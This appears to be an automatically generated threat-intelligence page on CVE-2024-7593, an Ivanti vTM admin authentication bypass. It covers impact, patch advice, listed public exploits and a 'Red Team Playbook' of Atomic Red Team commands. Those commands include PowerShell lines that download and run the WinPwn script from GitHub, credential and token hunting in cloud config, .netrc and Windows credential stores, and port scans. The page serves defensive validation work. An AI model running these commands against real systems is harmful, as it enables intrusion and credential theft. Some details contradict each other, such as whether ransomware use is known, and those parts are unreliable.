CVE-2024-7593
Overview
This vulnerability is an authentication bypass caused by an incorrect implementation of the authentication algorithm in Ivanti Virtual Traffic Manager (vTM). The flaw resides in the authentication mechanism of the admin panel, specifically affecting versions other than 22.2R1 and 22.7R2. The compromised component is the access control logic that validates administrative credentials, allowing unauthorized access.
Vulnerability Description
Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.
Impact
An unauthenticated attacker can gain full administrative access to the Ivanti vTM system, enabling modification of traffic management configurations and potentially disrupting network traffic flow. No prior authentication or user interaction is required to exploit this flaw. This level of access can lead to complete compromise of the affected system, exposing sensitive configuration data and control over network traffic policies.
Solution
Ivanti recommends upgrading affected Virtual Traffic Manager installations to versions 22.2R1 or 22.7R2, which contain the corrected authentication implementation. Detailed patching instructions and advisory information are available at Ivanti's security advisory portal: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593. Applying these updates will remediate the authentication bypass vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Ivanti's Virtual Traffic Management (vTM) software stems from an incorrect implementation of its authentication algorithm. This flaw allows remote unauthenticated attackers to bypass authentication mechanisms intended to protect the admin panel. The affected versions include those prior to 22.2R1 and 22.7R2, which are widely deployed in various environments. The critical nature of this vulnerability is underscored by its high CVSS score of 9.8, indicating a severe risk to systems utilizing these versions of the software. The improper handling of authentication processes can lead to unauthorized access, enabling attackers to manipulate configurations, access sensitive data, and potentially disrupt services.
Attack vectors for exploiting this vulnerability are particularly concerning due to the ease with which an attacker can initiate an attack. Since the flaw allows for remote exploitation without the need for authentication, attackers can leverage this weakness from anywhere on the internet. Scenarios may include targeted attacks against organizations using Ivanti vTM for load balancing and traffic management. A malicious actor could gain administrative privileges, allowing them to alter traffic rules, redirect users to malicious sites, or exfiltrate sensitive information. Moreover, the lack of authentication could facilitate lateral movement within a network, leading to further compromises of interconnected systems.
The real-world impact of this vulnerability is significant, posing substantial business risks. Organizations relying on Ivanti vTM for managing web traffic and application delivery could face severe operational disruptions if an attacker gains control of the admin panel. This could result in data breaches, loss of customer trust, and potential regulatory penalties, particularly if sensitive personal data is exposed. Additionally, the financial implications of remediation efforts, incident response, and potential downtime can be considerable. The reputational damage stemming from such an incident can have long-lasting effects on an organization’s standing in the market, further emphasizing the necessity for immediate action.
To detect and mitigate the risks associated with this vulnerability, organizations should prioritize updating their Ivanti vTM installations to the latest versions that address this flaw. Regular vulnerability assessments and penetration testing can help identify potential weaknesses in the system before they can be exploited. Implementing robust monitoring solutions can also aid in detecting unauthorized access attempts or unusual activities within the admin panel. Furthermore, organizations should enforce strict access controls and employ network segmentation to limit exposure to critical systems. Educating staff about security best practices and the importance of timely software updates can also play a crucial role in reducing the risk of exploitation.
In conclusion, the vulnerability in Ivanti's Virtual Traffic Management software represents a critical threat that necessitates immediate attention from affected organizations. The potential for unauthorized access to administrative functions poses a serious risk to system integrity and data security. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves to defend against this threat. Proactive measures, including timely updates and enhanced security practices, are essential to mitigate the risks associated with this vulnerability and safeguard sensitive information from malicious actors.
CSURFACE threat intelligence has detected a moderate increase in exploitation attempts targeting CVE-2024-7593, reflecting a growing interest by threat actors in leveraging the authentication bypass vulnerability in Ivanti vTM versions outside the secure releases 22.2R1 and 22.7R2. This uptick coincides with the continued availability of multiple new proof-of-concept exploits on public repositories, including a Metasploit module that broadens the affected version range, thereby lowering the technical barrier for adversaries to conduct unauthorized administrative access. Although ransomware groups have not yet been linked to campaigns exploiting this vulnerability, the expanded exploit landscape and rising detection trends underscore an elevated risk of compromise in environments running vulnerable Ivanti vTM versions. Consequently, the threat level should be considered heightened due to increased attacker activity and the ease of exploitation, warranting closer monitoring and prioritization in defensive postures.
Update 2 — June 07, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-7593, accompanied by the emergence of additional publicly available proof-of-concept exploits. This expansion in the exploit toolkit lowers the technical barriers for adversaries seeking to bypass Ivanti vTM administrative authentication, potentially accelerating unauthorized access incidents. While ransomware groups remain unassociated with this vulnerability, the uptick in detection activity signals growing adversary interest and operational testing. Consequently, the threat environment surrounding this vulnerability has intensified, warranting heightened vigilance as attackers refine and proliferate exploitation methods against vulnerable Ivanti vTM deployments.
Affected Products (6)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Virtual Traffic Management | 22.2 |
cpe:2.3:a:ivanti:virtual_traffic_management:22.2:*:*:*:*:*:*:*
|
|
|
Ivanti | Virtual Traffic Management | 22.3 |
cpe:2.3:a:ivanti:virtual_traffic_management:22.3:-:*:*:*:*:*:*
|
|
|
Ivanti | Virtual Traffic Management | 22.3 |
cpe:2.3:a:ivanti:virtual_traffic_management:22.3:r2:*:*:*:*:*:*
|
|
|
Ivanti | Virtual Traffic Management | 22.5 |
cpe:2.3:a:ivanti:virtual_traffic_management:22.5:r1:*:*:*:*:*:*
|
|
|
Ivanti | Virtual Traffic Management | 22.6 |
cpe:2.3:a:ivanti:virtual_traffic_management:22.6:r1:*:*:*:*:*:*
|
|
|
Ivanti | Virtual Traffic Management | 22.7 |
cpe:2.3:a:ivanti:virtual_traffic_management:22.7:r1:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Ivanti Virtual Traffic Manager Authentication Bypass (CVE-2024-7593)
auxiliary/admin/http/ivanti_vtm_admin
|
Michael Heinzl, ohnoisploited, mxalias | Unknown | - | View |
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
D3N14LD15K/CVE-2024-7593_PoC_Exploit
CVE-2024-7593 Ivanti Virtual Traffic Manager 22.2R1 / 22.7R2 Admin Panel Authentication Bypass PoC [EXPLOIT]
|
D3N14LD15K | 9 | 2 | 2024-09-24 | View |
|
h21n/CVE-2024-7593
|
h21n | 0 | 0 | 2024-10-12 | View |
|
intel365/CVE-2024-7593
|
intel365 | 0 | 0 | 2024-10-12 | View |
|
kernel364/CVE-2024-7593
|
kernel364 | 0 | 0 | 2024-10-12 | View |
|
rxerium/CVE-2024-7593
Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remo...
|
rxerium | 0 | 0 | 2024-08-28 | View |
|
voidbroker/CVE-2024-7593
|
voidbroker | 0 | 0 | 2024-10-12 | View |
Threat Feed
18 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-90 | Reflection Attack in Authentication Protocol |
30%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-7593 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-7593 |